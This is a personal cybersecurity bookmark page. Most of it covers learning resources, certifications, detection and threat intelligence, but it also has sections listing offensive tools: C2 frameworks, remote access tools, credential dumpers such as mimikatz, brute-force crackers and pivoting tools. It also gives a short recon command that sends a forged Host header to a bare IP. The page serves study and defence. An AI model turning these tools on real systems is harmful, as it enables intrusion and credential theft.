Cyber Security

January 9, 2025
December 31, 2022

ssl-tls
web-security
web-authentication

Cyber attack lifecycle/kill chain

Computer security - Wikiwand
Information security - Wikiwand

How do hackers get caught? - the hunt for the hacker. - YouTube
I wouldn’t give this cable to my worst enemy - O.MG Cable - YouTube

What's The Difference Between Cybersecurity Vs Information Security?
Cyber security targets online threats while information security takes a holistic approach.

carpedm20/awesome-hacking: A curated list of awesome Hacking tutorials, tools and resources
onlurking/awesome-infosec: A curated list of awesome infosec courses and training resources.

DEFCONConference - YouTube

NetworkChuck
FREE Security+ SY0-601 // Complete Course // thisisIT 2020 - YouTube
Hacker Skills // OSINT (Information Gathering) - YouTube
Learn Ethical Hacking (CEH Journey) - YouTube

Project Zero
Black Hat | Home
The Daily Swig | Cybersecurity news and views
WhiteHat Security Blog
Blog - Security Research | Akamai
Hacking Articles - Raj Chandel's Blog
InfoSec Write-ups
Jorge Lajara Website
Yealvare – Medium
Dark Reading | Security | Protect The Business
ASecuritySite: When Bob Met Alice – Medium

hak5
Official PCI Security Standards Council Site - Verify PCI Compliance, Download Data Security and Credit Card Security Standards
#1 Crowdsourced Cybersecurity Platform | Bugcrowd

CTF Handbook
What is ired.team notes? | Red Team Notes

0x00sec - The Home of the Hacker
0x00pf/0x00sec_code: Code for my 0x00sec.org posts
Topics - Activity - 0x00pf - 0x00sec - The Home of the Hacker
Topics - Activity - Danus - 0x00sec - The Home of the Hacker

Aif4thah/Dojo-101: Cybersecurity Knowledge Base

Cybersecurity and Its Ten Domains - University System of Georgia | Coursera
Altered Security: Hands-On Enterprise Security and Red Team Labs Windows attacks
Welcome to the Red Canary 2023 Threat Detection Report Windows attacks

The Protection of Information in Computer Systems (PDF)

Feisty Duck: Fine computer security and open source books

Identity eats security: How identity management is driving security | CSO Online detect intrusion beyond authentication

5 Common Methods Hackers Use to Break Into Your Bank Account
10 Ways to Keep a Rogue RasPi From Wrecking Your ...

Palo Alto’s 134-slide presentation reveals the insides of the global cyber market | Ctech market size

Glossaries

Essential IT and Cybersecurity Acronyms Every ITOps Pro Should Know

APT: Advanced Persistent Threat
CISA: Cybersecurity and Infrastructure Security Agency
CISO: Chief Information Security Officer
DEP: Data Execution Prevention (prevent Exploitation)
DFIR: Digital Forensics and Incident Response
EDR: Endpoint Detection and Response
ETDR: Endpoint Threat Detection and Response
IDS: Intrusion Detection System
IPS: Intrusion Prevention System
MSP: Managed Service Provider
MSSP: Managed Security Service Provider
RAT: Remote Administration Tool
RCE: Remote Code Execution
RMM: Remote Management and Monitoring
SDR: Security Detection and Response
SDP: Software Defined Perimeter (in networks)
SIEM: Security Information and Event Management
SOAR: Security Orchestration, Automation and Response
SOC: Security Operation Center
SRAA: Security Risk Assessment & Audit
TTP: Tactics, Techniques, and Procedures (from MITRE ATT&CK)
PPT: People, Process, Technology (MITRE ATT&CK mitigation)
XDR: Extended Detection and Response

Cyber Kill Chain

Cyber Kill Chain® | Lockheed Martin
Cybersecurity Kill Chain Series - YouTube❗!important

The focus of the first 4 stages is PREVENTION.
The focus of the last 3 stages is DETECTION and RESPONSE.

MITRE ATT&CK

MITRE ATT&CK® tactics, techniques, and procedures (TTPs) of adversaries
ATT&CK® Navigator interactive notebook
How to Avoid Messing Up Your Security Program with ATT&CK™

Enterprise Detection & Response: The Pyramid of Pain TTP detection and mitigation is hard to avoid

ATT&CK Matrix: The Enemies Playbook - YouTube
The Anatomy of an Att&ck - YouTube

Putting MITRE ATT&CK™ into Action with What You Have, Where You Are presented by Katie Nickels - YouTube❗!important
Putting MITRE ATT&CK into Action with What You Have, Where You Are | PPT

MITRE ATT&CKcon 2018: Helping Your Non-Security Executives Understand ATT&CK in 10 Minutes or Less - YouTube
MITRE ATT&CKcon 2018: ATT&CK as a Teacher - YouTube ❗!important

Introduction to STIX
mitre-attack/attack-stix-data: STIX data representing MITRE ATT&CK

Adversary Emulation

Adversary Emulation Plans | MITRE ATT&CK®
ATT&CK® Evaluations

Caldera
mitre/caldera: Automated Adversary Emulation Platform
Using MITRE Caldera to Emulate Threats in Your Environment - YouTube

endgameinc/RTA Red Team Automation (RTA)

Explore Atomic Red Team
redcanaryco/atomic-red-team: Small and highly portable detection tests based on MITRE's ATT&CK.

uber-common/metta: An information security preparedness tool to do adversarial simulation.

mitreattack-python library — mitreattack-python documentation
mitre-attack/mitreattack-python: A python module for working with ATT&CK

03. x33fcon 2018 - Threat-based Purple Teaming with ATT&CK by Chris and Cody from MITRE - YouTube

DevSecOps

What Is DevSecOps?
4 Key Differences Between DevOps and DevSecOps | Boot.dev

Security as Code Protects Rapidly Developing Cloud Native Architectures - The New Stack
Product | Security as Code - oak9

DevSecOps Tools | Atlassian

Incident Response

Best Practices for Preparing for a Cyber Breach
After a Cyber Incident: Guide To CISO Career Protection
Footprints » Linux Magazine

After My Data Was Breached, Here's How I Protected My Accounts

Learning/Courses/Videos

Free Courses That Are Actually Free: Cybersecurity Edition - KDnuggets
Which Platform Is Better: TryHackMe or Hack The Box? - YouTube

Yeah Hub - Kali Linux Tutorials | Tech News | SEO Tips and Tricks
yeahhub/Hacking-Security-Ebooks: Top 100 Hacking & Security E-Books (Free Download)
yeahhub/Kali-Linux-Ebooks: Top 20 Kali Linux Related E-books (Free Download)

TryHackMe | Cyber Security Training
TryHackMe! Basic Penetration Testing - YouTube

Hack The Box: Hacking Training For The Best | Individuals & Companies
hack the box - YouTube

An Interactive Cyber Security Platform | Defend the Web originally HackThis!!

OverTheWire: Wargames

Yizheng's Homepage
hacksplaining - Lessons

HackTricks ❗!important
Hack Smarter
Hack This Site
ThisisLegal.com - Are You?

Red Team Development and Operations | Red Team Development and Operations

Dashboard | HackerRank

The Defenders Movie | Cybersecurity Documentary
Douglas Crockford: Principles of Security - YouTube
The Lazy Programmer's Guide to Secure Computing - YouTube
An Overview of the Security Ecosystem in Programming - via @codeship | via @codeship
Transitioning Into a Penetration Testing Role | Schellman

3 FREE Resources for Cyber Defenders - YouTube
The DFIR Report - Real Intrusions by Real Attackers, The Truth Behind the Intrusion real world attack reports

edX: Try It: Ethical Hacking | edX
RITx: Cybersecurity Fundamentals | edX
CurtinX: Cybersecurity and Privacy in the IoT | edX

Ethical Hacking Full Course - Learn Ethical Hacking in 10 Hours | Ethical Hacking Tutorial | Edureka - YouTube

HackOvert - YouTube
InsiderPhD - YouTube
IppSec - YouTube HackTheBox
John Hammond - YouTube JohnHammond - GitHub
HackerOne - YouTube
MalwareTech - Everything Cyber Security the guy who disabled WannaCry
Marcus Hutchins - YouTube
mitrecorp - YouTube
NetworkChuck - YouTube
The CISO Perspective - YouTube
Tyler Ramsbey || Hack Smarter - YouTube
webpwnized - YouTube
x33fcon - YouTube

Jack Rhysider - YouTube hacker story

Pentester Academy TV - YouTube also on embedded Linux
PentesterAcademy Labs - YouTube

jhaddix - YouTube
Jason Haddix - Bug Hunter's Methodology (Series) - YouTube

thehackerish - YouTube
Web hacking training [hands-on] - YouTube
Live hacking sessions - YouTube

David Bombal - YouTube
The best Hacking Courses & Certs (not all these)? Your roadmap to Pentester success. - YouTube
2023 Roadmap to Master Hacker - YouTube
Real World Hacking Demo with OTW - YouTube

Juniper Networks Training Course Catalog free courses
Get Started with Free Juniper Training

qwqdanchun RED team, releasing attack tools
Malware Study Notes - Malware Note

Certifications

CompTIA Sec+, CySA+, CASP are all respectable certifications but Pentest+ ... won't teach you how to pen test.

Cyber Security Certificate Tier List - YouTube

Course Specific Resources for Offsec Students – OffSec Support Portal

Cybersecurity Certifications | Information Security Certifications | ISC2

10 Popular Cybersecurity Certifications [2025 Updated] | Coursera
Your Ultimate Guide to Cybersecurity Certifications
What Is OSCP Certification and Is it Worth It? 2025 Guide | Coursera

Google Cybersecurity Certificate - Grow with Google
Google Cybersecurity Professional Certificate | Coursera

Offensive Security Web Expert (OSWE)

OSWE Exam FAQ – OffSec Support Portal

WEB-300: Advanced Web Application Security Certification | OffSec
WEB-300: Advanced Web Attacks and Exploitation OSWE Exam Guide – OffSec Support Portal

The OSWE Review and Exam Preparation Guide | Schellman
OSWE Review - Tips & Tricks (Offensive Security Web Expert) - YouTube

Foundational Web Application Assessments with Kali Linux (OSWA)

WEB-200: Foundational Web Application Assessments with Kali Linux (OSWA) Exam Guide – OffSec Support Portal
OSWA Exam FAQ – OffSec Support Portal

WEB-200: Foundational Web Application Assessments with Kali Linux | OffSec
Web Attacks with Kali Linux (WEB-200) – OffSec Support Portal

OffSec Certified Professional (OSCP)

hard

What Is OSCP Certification and Is it Worth It? 2025 Guide | Coursera

PEN-200: Penetration Testing Certification with Kali Linux | OffSec
Penetration Testing with Kali Linux (PEN-200) – OffSec Support Portal

OffSec Advanced Evasion Techniques and Breaching Defenses (OSEP)

OSEP Exam Guide – OffSec Support Portal
OSEP Exam FAQ – OffSec Support Portal

PEN-300: Advanced Penetration Testing Certification | OffSec
Evasion Techniques and Breaching Defenses (PEN-300) – OffSec Support Portal

OSEP PEN-300 Course Review | Schellman

OffSec Foundational Wireless Network Attacks (OSWP)

OSWP Exam Guide – OffSec Support Portal
OSWP Exam FAQ – OffSec Support Portal

(PEN-210) Foundational Wireless Network Attacks FAQ – OffSec Support Portal

Certified Information Systems Security Professional (CISSP)

CISSP - Certified Information Systems Security Professional | ISC2

Get CISSP Certified: A Self-Study Guide to Success | Schellman

CompTIA Security+

https://www.comptia.org/certifications/security

Certified Ethical Hacker (CEH)

some comments EC Council is trash

CEH Certification | Ethical Hacking Training & Course | EC-Council
Certified Ethical Hacker Online Training | CEH Training

Burp Suite Certified Practitioner

Burp Suite Certified Practitioner | Web Security Academy - PortSwigger
How the Burp Suite Certified Practitioner exam process works | Web Security Academy - PortSwigger

The Burp Suite Certified Practitioner Exam: A Review | Schellman

CTF/Labs

CTFtime.org / All about CTF (Capture The Flag)

Welcome [Root Me: learning platform dedicated to Hacking and Information Security]

Pay What You Can – Antisyphon Training pay what you can, free tier available

Pentester Academy's AttackDefense Lab
PentesterAcademy Labs - YouTube
Pentester Academy Blog

Cybersecurity Labs (FOR FREE) - Linux Backdoor Analysis - YouTube
IntroLabs/IntroClassFiles/navigation.md at master · strandjs/IntroLabs
ClassLabs/navigation.md at main · strandjs/ClassLabs

Ne0Lux-C1Ph3r/WRITE-UP: Write up CTF

Introduction · CTF Field Guide source
trailofbits/ctf-challenges: CTF Challenges

CTF 2023 - Capture the Flag Challenge

Fetch the Flag
Getting started with CTF | Snyk
Snyk | Capture the Flag Workshop
Fetch the Flag CTF 2023 | Snyk

picoCTF - CMU Cybersecurity Competition
picoCTF - Learning Resources
The CTF Primer

Katana - Automatic CTF Challenge Solver — Katana 1.0 documentation
JohnHammond/katana: Katana - Automatic CTF Challenge Solver in Python3
RsaCtfTool/RsaCtfTool: RSA attack tool (mainly for ctf) - retrieve private key from weak public key and/or uncipher data

JohnHammond/ctf-katana: This repository aims to hold suggestions (and hopefully/eventually code) for CTF challenges. The "project" is nicknamed Katana. the concept
JohnHammond/labs: Free and publicly available training labs and exercises, for quick copy-and-paste demonstrations, learning and education.

Google CTF
PwnFunction - YouTube
LiveOverflow - YouTube

I Hacked & Exposed This Evil Website for Educational Purposes. - YouTube

Detection and Response

What is XDR vs EDR vs MDR? Breaking down Extended Detection and Response - YouTube
EDR, MDR & XDR Explained - YouTube
SIEM, EDR, XDR, MDR & SOAR | Cybersecurity Tools and Services | Threat Monitoring - YouTube

Detection

No, Your Antivirus Doesn't Need to Be Open Source—Here's Why

Security Onion Solutions
Security-Onion-Solutions/securityonion: Security Onion is a free and open platform for threat hunting, enterprise security monitoring, and log management. It includes our own interfaces for alerting, dashboards, hunting, PCAP, detections, and case management. It also includes other tools such as osquery, CyberChef, Elasticsearch, Logstash, Kibana, Suricata, and Zeek.

EQL Analytics Library — EQL Analytics Library documentation

OTRF/ThreatHunter-Playbook: A community-driven, open-source project to share detection logic, adversary tradecraft and resources to make detection development more efficient.

atc-project/atomic-threat-coverage: Actionable analytics designed to combat threats

Sigma - SIEM Detection Format | The shareable detection format for security professionals.
SigmaHQ/sigma: Main Sigma Rule Repository
SigmaHQ/sigma-cli: The Sigma command line interface based on pySigma

YARA - The pattern matching swiss knife for malware researchers
Welcome to YARA’s documentation!
matonis/yara_tools: Create an entire YARA rule via Python? Whhhhhhaatttt?
Applied YARA training
yara Archives | APNIC Blog
Classify Malware with YARA - YouTube

VirusTotal
API Scripts and client libraries – VirusTotal
Compliant, easy and actionable integration of VirusTotal in 3rd-party products - Welcome VT Augment ~ VirusTotal Blog

SwiftOnSecurity/sysmon-config: Sysmon configuration file template with default high-quality event tracing
cisagov/LME: Logging Made Easy (LME) is a free and open logging and protective monitoring solution serving all organizations.

Cyber Threat Intelligence

Using MITRE allows to:

Groups | MITRE ATT&CK®
The Cycle of Cyber Threat Intelligence - YouTube

Cyber Threat Intelligence Technical Committee
STIX 2 and TAXII 2 are JSON and RESTful API friendly.
Introduction to STIX serialization format
Introduction to TAXII protocol for data exchange

Trusted Automated eXchange of Indicator Information (TAXII™) | TAXII Project Documentation 1.x

Server and client (support up to 1.1 of the TAXII standard)
OpenTAXII documentation
eclecticiq/OpenTAXII: TAXII server implementation in Python from EclecticIQ
Cabby documentation
eclecticiq/cabby: TAXII client implementation from EclecticIQ

Hyperscale ML threat intelligence for early detection & disruption | Microsoft Community Hub
Simplify your SOC with Rob Lefferts and Allie Mellen
[2411.06239] Web Scale Graph Mining for Cyber Threat Intelligence

Endpoint Detection and Response (EDR)

AURORA Agent - Nextron Systems
Aurora Agent User Manual — Aurora Agent User Manual documentation
sigma/rules at master · SigmaHQ/sigma

Detect Hackers & Malware on your Computer (literally for free) - YouTube

Extended Detection and Response (XDR)

#Wazuh

IDS/IPS

Snort - Network Intrusion Detection & Prevention System

The Zeek Network Security Monitor
Zeek Documentation — Book of Zeek
zeek/zeek: Zeek is a powerful network analysis framework that is much different from the typical IDS you may know.

CrowdSec - The open-source & collaborative security suite
How to Install and Configure CrowdSec on OPNsense

Suricata

Home - Suricata
IPS inline mode

11. Performance — Suricata documentation

Rules parsers:
m-chrome/py-suricataparser: Pure python parser for Snort/Suricata rules.
m-chrome/go-suricataparser: Golang Suricata/Snort rules parser and generator
theY4Kman/parsuricata: Parse Suricata rules lark grammar, parse ports

Name: et/open
  Vendor: Proofpoint
  Summary: Emerging Threats Open Ruleset
  License: MIT
Name: et/pro
  Vendor: Proofpoint
  Summary: Emerging Threats Pro Ruleset
  License: Commercial
  Replaces: et/open
  Parameters: secret-code
  Subscription: https://www.proofpoint.com/us/threat-insight/et-pro-ruleset
Name: oisf/trafficid
  Vendor: OISF
  Summary: Suricata Traffic ID ruleset
  License: MIT
Name: ptresearch/attackdetection
  Vendor: Positive Technologies
  Summary: Positive Technologies Attack Detection Team ruleset
  License: Custom
Name: scwx/enhanced
  Vendor: Secureworks
  Summary: Secureworks suricata-enhanced ruleset
  License: Commercial
  Parameters: secret-code
  Subscription: https://www.secureworks.com/contact/ (Please reference CTU Countermeasures)
Name: scwx/malware
  Vendor: Secureworks
  Summary: Secureworks suricata-malware ruleset
  License: Commercial
  Parameters: secret-code
  Subscription: https://www.secureworks.com/contact/ (Please reference CTU Countermeasures)
Name: scwx/security
  Vendor: Secureworks
  Summary: Secureworks suricata-security ruleset
  License: Commercial
  Parameters: secret-code
  Subscription: https://www.secureworks.com/contact/ (Please reference CTU Countermeasures)
Name: sslbl/ssl-fp-blacklist
  Vendor: Abuse.ch
  Summary: Abuse.ch SSL Blacklist
  License: Non-Commercial
Name: sslbl/ja3-fingerprints
  Vendor: Abuse.ch
  Summary: Abuse.ch Suricata JA3 Fingerprint Ruleset
  License: Non-Commercial
Name: etnetera/aggressive
  Vendor: Etnetera a.s.
  Summary: Etnetera aggressive IP blacklist
  License: MIT
Name: tgreen/hunting
  Vendor: tgreen
  Summary: Threat hunting rules
  License: GPLv3
sudo suricata-update enable-source oisf/trafficid
sudo suricata-update enable-source ptresearch/attackdetection
sudo suricata-update   # Do not forget to update rules after activating source

SELKS by Stamus Networks
StamusNetworks/SELKS: A Suricata based IDS/IPS/NSM distro

Aristotle Documentation
secureworks/aristotle

EveBox | EveBox Suricata EVE JSON viewer

StamusNetworks/scirius: Scirius is a web application for Suricata ruleset management and threat hunting.

Dataset

20. Public Data Sets — Suricata documentation

Malware Capture Facility Project — Stratosphere IPS

Wazuh

Wazuh · The Open Source Security Platform
Wazuh documentation
Wazuh GitHub Org
wazuh/wazuh-ruleset: Wazuh - Ruleset

Improve your security posture with Wazuh, a free and open source XDR
you need this FREE CyberSecurity tool - YouTube

Supply Chain Attack

copyright-open-source#Software BOM (bill of material)

Open Source & Software Supply Chain Risks Blog | Synopsys
Snyk Vulnerability Database | Snyk

npm audit: Broken by Design — Overreacted audit tools should not cause noise

Social Engineering

7 Types of Phishing Attacks You Should Know About

OT security

What is Operational Technology (OT) Security? - Cisco

Securing OT Networks: Strategies and Best Practices | OTORIO
Best Practices for Operational Technology (OT) Security | OTORIO

Products - ISA/IEC-62443-3-3: What is it and how to comply? - Cisco
Guide to Operational Technology (OT) Security NIST.SP.800

Cybersec Tools

The Tool Box - YouTube
19 open source GitHub projects for security pros | InfoWorld

penetration testing - freeCodeCamp.org
Tib3rius/Pentest-Cheatsheets

Conduct a Penetration Test Like a Pro in 6 Phases [Tutorial] - YouTube

Commando VM: The First of Its Kind Windows Offensive Distribution | Mandiant | Google Cloud Blog

Soldie/Yuki-Chan-The-Auto-Pentest

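Goby: asset mapping and practical vulnerability scanning tool asset scan, PoC
MY0723/goby-poc: 451 Goby PoCs; judge for yourself whether any are backdoored or duplicated; Goby & PoCs collected from the Internet, updated irregularly.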
D-Haiming/gobypoc: This repository comes from an Internet collection

swisskyrepo/PayloadsAllTheThings: A list of useful payloads and bypass for Web Application Security and Pentest/CTF

DMitry - Deepmagic Information Gathering Tool
godaddy/procfilter: A YARA-integrated process denial framework for Windows
The Bro Network Security Monitor

fortra/impacket: Impacket is a collection of Python classes for working with network protocols. ❗!important

mostaphabahadou/postenum: A lightweight, portable, and modular tool for Linux enumeration and privilege escalation.

hping3 | Kali Linux Tools
hping3(8) - Linux man page

trustedsec/ptf: The Penetration Testers Framework (PTF) is a way for modular support for up-to-date tools.

Home - Open Source Security Foundation
Who we are and what we do | The Hacker’s Choice

pr4jwal/quick-scripts: A collection of my quick and dirty scripts for vulnerability POC and detections
CISOfy/lynis: Lynis - Security auditing tool for Linux, macOS, and UNIX-based systems. Assists with compliance testing (HIPAA/ISO27001/PCI DSS) and system hardening. Agentless, and installation optional.

GAUNTLT - Go Ahead, Be Mean To Your Code - Security and Rugged Testing
gauntlt/gauntlt: a ruggedization framework that embodies the principle "be mean to your code"

AC-Hunter™ - Active Countermeasures free community edition
Network Threat Hunting Made Easy (Finding Hackers) - YouTube

activecm/rita: Real Intelligence Threat Analytics (RITA) is a framework for detecting command and control communication through network traffic analysis.

KASM

Kasm Workspaces | The Container Streaming Platform

Kasm Workspaces: Your Solution for Remote Desktops? Full Review! - YouTube
create the ULTIMATE hacking lab in 5min!! (Docker Containers STREAMING Kali Linux to your browser) - YouTube

Kali Linux

kali-linux - LinuxServer.io dockerized Kali accessed via VNC

Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution
Kali Tools | Kali Linux Tools
Introduction to Kali Linux - GeeksforGeeks

kali-tweaks

An introduction to Kali Linux - Help Net Security
5 Kali Linux tools you should learn how to use - Help Net Security
University of Kali Linux - YouTube

seclists | Kali Linux Tools

Und3rf10w/kali-anonsurf: A port of ParrotSec's stealth and anonsurf modules to Kali Linux send all traffic via Tor network

Introduction | Daxueba Kali Linux Security Penetration Testing Tutorial

Official Kali Linux Docker Images | Kali Linux Documentation no services installed
artis3n/kali-artis3n: A kalilinux/kali-rolling container with extra juice.
blairjames/kali-ready-to-roll: The latest kali-rolling with kali-linux-headless and wordlists installed.

Kali Linux NetHunter

for Android

What is Kali NetHunter for Android? | Simplilearn

BlackArch

BlackArch Linux - Penetration Testing Distribution
BlackArch/blackarch: An ArchLinux based distribution for penetration testers and security researchers.

Parrot Security OS

Parrot Security
What is Parrot Security OS? Features & Installation | Simplilearn

Metasploit

Penetration Testing Software | Metasploit

How to Hack Like a Pro: Getting Started with Metasploit « Null Byte :: WonderHowTo
Metasploit — A Walkthrough Of The Powerful Exploitation Framework

Metasploit For Beginners | What is Metasploit Explained | Metasploit Basics Tutorial | Simplilearn - YouTube
Penetration Testing with Metasploit: A Comprehensive Tutorial - YouTube

GOSINT

ciscocsirt/GOSINT: The GOSINT framework is a project used for collecting, processing, and exporting high quality indicators of compromise (IOCs). 🗃️archived
Welcome to GOSINT’s documentation! — gosint 0.0.1 documentation

GOSINT: A framework for collecting, processing, and exporting IOCs

Jok3r

Jok3r v3 - Network & Web Pentest Automation Framework
koutto/jok3r: Jok3r v3 BETA 2 - Network and Web Pentest Automation Framework

Jok3r: A Framework for Automated Network and Web Penetration Testing

Vulnerability scanner

13 Online Vulnerability Scanning Tools to Scan your Website Security
Vulnerability Scans and False Positives

OpenVAS - Open Vulnerability Assessment Scanner
Greenbone Community Documentation
greenbone/openvas-scanner: This repository contains the scanner component for Greenbone Community Edition.

Install Nessus for Free and scan for Vulnerabilities (New Way) - YouTube Nessus Essentials
Best FREE Vulnerability Scanner: Nessus Vs OpenVAS (Greenbone) - YouTube
Tenable Nessus Essentials Vulnerability Scanner | Tenable®

Attack Tool Kit / Introduction
411Hall/JAWS: JAWS - Just Another Windows (Enum) Script
carlospolop/PEASS-ng: PEASS - Privilege Escalation Awesome Scripts SUITE (with colors)
rebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks

Linux Privilege Escalation with LinEnum | by Trevor Cohen | Medium

trufflesecurity/trufflehog: Find credentials all over the place
RhinoSecurityLabs/pacu: The AWS exploitation framework, designed for testing the security of Amazon Web Services environments.

Measuring Vulnerability Scanner Quality with Grype and Yardstick | Anchore
anchore/yardstick: Compare vulnerability scanners results (to make them better!)

SCARLETEEL: Operation leveraging Terraform, Kubernetes, and AWS for data theft – Sysdig

Honeypot

paralax/awesome-honeypots: an awesome list of honeypot resources

[PDF] An Extensive Study of Honeypot Technique | Semantic Scholar
[PDF] Honeypot as the Intruder Detection System | Semantic Scholar
(PDF) Flow based containerized honeypot approach for network traffic analysis: An empirical study

Kippo - SSH Honeypot
Project Heisenberg
GHH - The "Google Hack" Honeypot
NozomiNetworks/pywinbox

Building an IoT Honeypot in 5 Steps

telekom-security/tpotce: 🍯 T-Pot - The All In One Honeypot Platform 🐝
tpotce v22.04.0 releases: The All In One Honeypot Platform • Penetration Testing
30 Days of Honeypot Tasting :: 11th iThome Ironman Contest

HoneyTrap | HoneyTrap
honeytrap/honeytrap: Advanced Honeypot framework.

lyrebird/honeypot-base - Docker Image | Docker Hub uses mitmproxy to capture SSH traffic

Honeynet Project

The Honeynet Project
The Honeynet Project GitHub Org

Glutton 1.0 Release
mushorg/glutton: Generic Low Interaction Honeypot
honeynet/ochi UI for events from Glutton

kung-foo/freki: Freki is a tool to manipulate packets in usermode using NFQUEUE and golang.

Reconnaissance

shell-network#nmap

Real World Hacking Tools Tutorial (Target: Tesla) - YouTube
Open Source Intelligence (OSINT)

BuiltWith Technology Lookup GA code lookup
Shodan Search Engine infrastructure lookup
WHOIS API | WHOIS Lookup API | Domain WHOIS API reverse WHOIS
Home • Directory Lister
TLS cert scan on AWS IP

OJ/gobuster: Directory/File, DNS and VHost busting tool written in Go

Naked IP without DNS

Use Host: in HTTP request to mock the host header

xh --verify no --print hHbB https://42.200.27.32/ "HOST:www1.ha.org.hk"
xh --verify no --print hHbB https://42.200.27.32/

Pivoting/Tunneling/Proxy

Detection Evasion

ssh#SSH Tunneling
Tunneling Through Protected Networks | Master Network Pivoting - YouTube

Chisel

reverse tunnel, socks proxy

jpillora/chisel: A fast TCP/UDP tunnel over HTTP
How To Pivot Through a Network with Chisel - YouTube

Pivoting with Chisel | Ap3x Security
Pivoting with Chisel

PayloadsAllTheThings/Methodology and Resources/Network Pivoting Techniques.md at master · swisskyrepo/PayloadsAllTheThings

proxychains

CLI command wrapper

haad/proxychains: proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4, SOCKS5 or HTTP(S) proxy. Supported auth-types: "user/pass" for SOCKS4/5, "basic" for HTTP.
rofl0r/proxychains-ng: proxychains ng (new generation) - a preloader which hooks calls to sockets in dynamically linked programs and redirects it through one or more socks/http proxies. continuation of the unmaintained proxychains project. the sf.net page is currently not updated, use releases from github release page instead.
How do those hackers' tools work? Proxychains - Programming - 0x00sec - The Home of the Hacker
2.4 Setting up ProxyChains | Daxueba Kali Linux Security Penetration Testing Tutorial

learning hacking? DON'T make this mistake!! (hide yourself with Kali Linux and ProxyChains) - YouTube

Browser

FoxyProxy - Home
FoxyProxy Standard
FoxyProxy Standard – Get this Extension for 🦊 Firefox (en-US)

Exploitation

Exploitation to gain access/execute code after gaining access

see #Buffer Overflow, #Process Injection

Privilege Escalation

GTFOBins

PrintSpoofer
Godpotato

linpeas | grimbins
PEASS-ng/linPEAS at master · carlospolop/PEASS-ng

PEASS-ng/winPEAS at master · carlospolop/PEASS-ng

TryHackMe! Abusing SETUID Binaries - Vulnversity - YouTube

C2 Server

Havoc
HavocFramework/Havoc: The Havoc Framework.

Sliver | Bishop Fox
BishopFox/sliver: Adversary Emulation Framework
HTTP(S) C2 · BishopFox/sliver Wiki
Sliver C2 — Modern Command and Control Exploitation Framework | by Yua Mikanana | Sep, 2023 | Medium

Global Socket | Connect like there is no firewall. Securely.
hackerschoice/gsocket: Connect like there is no firewall. Securely. gs-netcat

ldcsaa/HP-Socket: High Performance TCP/UDP/HTTP Communication Component

Remote Access Tool (RAT)

Remcos | Remote Control & Surveillance Software

quasar/Quasar: Remote Administration Tool for Windows

Password Hacking

web-authentication#Active Directory

Password Hacking in Kali Linux - YouTube

Hacking Complex Passwords with Rules & Munging - YouTube

Password Dumping

Credential Access

ParrotSec/mimikatz Windows
Mimikatz: everything you need to know | NordVPN
Mimikatz - Red Canary Threat Detection Report

outflanknl/Dumpert: LSASS memory dumper using direct system calls and API unhooking. Windows

dump hashes
impacket/examples/secretsdump.py at master · fortra/impacket · GitHub

Hydra

ssh brute force

hydra | Kali Linux Tools
SSH Password Testing With Hydra on Kali Linux - Linux Tutorials - Learn Linux Configuration
How to Use Hydra to Hack Passwords – Penetration Testing Tutorial

Hydra - SSH BruteForce - YouTube
How to HACK Website Login Pages | Brute Forcing with Hydra - YouTube

John The Ripper

John the Ripper documentation
How to Crack Passwords using John The Ripper – Pentesting Tutorial

Dictionary attack

cupp: generate passwords dictionary
how to HACK a password // Windows Edition - YouTube

Hashcat: dictionary attack
how to HACK a password // password cracking with Kali Linux and HashCat - YouTube

Zero Trust Network

vpn#Tailscale
vpn#Twingate

IP address, network id
Workload id, service id

Zero Trust: Time to Get Rid of Your VPN – The New Stack
ZTNA: What is Zero Trust Network Access? | Twingate
Why zero-trust models should replace legacy VPNs
Zero Trust Maturity Model | CISA
The Death of the Corporate Network
Architecting Network Connectivity for a Zero Trust Future | Twingate
Why Access Management Is Step One for Zero Trust Security – The New Stack

Guest Blog: k8s tunnels with Kudelski Security

What is Zero Trust Network Access (ZTNA)? The Zero Trust Model, Framework and Technologies Explained - YouTube
Accomplishing Zero Trust Security Using SDP - YouTube

Zero Trust Network Access (ZTNA) vs Virtual Private Networking (VPN) - YouTube
What is Zero Trust (And How To Accelerate Your Strategy) - YouTube

How To Implement Zero-Trust Security in Linux Environments

OpenZiti

OpenZiti - Open Source Zero Trust Networking
OpenZiti
OpenZiti Test Kitchen

openziti-test-kitchen/zssh: Ziti SSH
Zero Trust SSH Client Explained

SPIFFE

SPIFFE – Secure Production Identity Framework for Everyone
spiffe/spiffe: The SPIFFE Project

SPIFFE in a Nutshell - Pushpalanka Jayawardhana - Medium
Sunil James, CEO of Scytale, Explains SPIFFE - The New Stack

Wireless

Wifi

3 Levels of WiFi Hacking - YouTube NetworkChuck

Aircrack-ng
aircrack-ng/aircrack-ng: WiFi security auditing tools suite

Wifiphisher - The Rogue Access Point Framework
wifiphisher/wifiphisher: The Rogue Access Point Framework

Air Gap attacks

Home | Air Gap Research Page
new attack leaks secrets using RAM as a radio - YouTube

Cybersec Hardware

Embedded Systems

Hardware Hacking: UART Magic with Alxhh | Bugcrowd
Breaking into an Embedded Linux System eBook QEMU setup

Make Me Hack - YouTube QEMU and hardware hacking
Matt Brown - YouTube IoT hacking

How We Hacked a TP-Link Router and Took Home $55,000 in Pwn2Own - YouTube
Hacker's Guide to UART Root Shells - YouTube
US Government to Ban TP-Link Devices - Live Hacking of a Chinese WiFi Router - YouTube

this can't be real. - YouTube bug in MediaTek SDK
4 exploits, 1 bug: exploiting CVE-2024-20017 4 different ways | hyprblog
Critical Exploit in MediaTek Wi-Fi Chipsets: Zero-Click Vulnerability (CVE-2024-20017) Threatens Routers and Smartphones | SonicWall

Hacking an AT&T 4G Router For Fun and User Freedom - YouTube using uboot CLI, dump config partition

Introduction to Firmware Reversing - YouTube
Intro to Hardware Reversing: Finding a UART and getting a shell - YouTube
this is my favorite hardware hacking tool - YouTube firmware dump

  1. Download firmware image
  2. binwalk -Me ${image}
  3. Look for jffs2 (extract with jefferson) or squashfs

Flipper Zero

Flipper Zero — Portable Multi-tool Device for Geeks
flipperdevices/flipperzero-firmware: Flipper Zero firmware source code

Talking Sasquach - YouTube
Flipper Zero Videos - YouTube

Flipper Zero - Starter Guide - YouTube
Flipper Zero - A Hackers Review - YouTube

This Makes Hacking TOO Easy - Flipper Zero - YouTube

David Bombal
Flipper Zero: Hottest Hacking Device for 2023? - YouTube
Flipper Zero - YouTube

Custom Firmware

Flipper Zero Firmware Update via qFlipper

